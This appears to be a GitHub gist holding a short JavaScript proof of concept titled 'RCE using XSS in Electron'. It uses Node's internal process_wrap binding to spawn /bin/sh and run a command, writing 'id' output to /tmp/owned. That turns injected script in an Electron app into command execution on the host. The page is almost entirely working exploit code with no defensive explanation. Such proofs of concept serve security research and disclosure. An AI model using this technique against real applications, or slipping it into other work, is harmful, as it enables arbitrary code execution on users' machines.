Skip to content

Instantly share code, notes, and snippets.

@thejh
Created August 24, 2016 01:21
Show Gist options
  • Save thejh/a954777d023abd794e1fecb5d2791365 to your computer and use it in GitHub Desktop.
Save thejh/a954777d023abd794e1fecb5d2791365 to your computer and use it in GitHub Desktop.
RCE using XSS in Electron
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment